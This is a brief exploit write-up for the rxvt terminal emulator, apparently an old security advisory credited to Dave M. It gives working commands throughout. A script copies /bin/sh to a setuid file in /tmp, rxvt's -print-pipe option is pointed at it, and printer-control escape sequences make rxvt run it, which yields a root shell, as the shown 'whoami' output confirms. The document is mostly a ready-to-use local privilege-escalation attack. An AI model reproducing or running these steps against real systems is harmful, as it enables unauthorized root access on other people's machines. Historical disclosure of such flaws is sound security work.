Exploit:

 1. Set DISPLAY environment variable so you can use x clients.
 2. In user shell:
    $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
    $ chmod +x /tmp/rxbug
    $ rxvt -print-pipe /tmp/rxbug
 3. In rxvt xclient:
    $ cat
      ESC[5i
      ESC[4i
    (The client will close at this point with a broken pipe)
 4. $ /tmp/rxsh
    # whoami
    root
    #

                                      Author: Dave M. (davem@cmu.edu)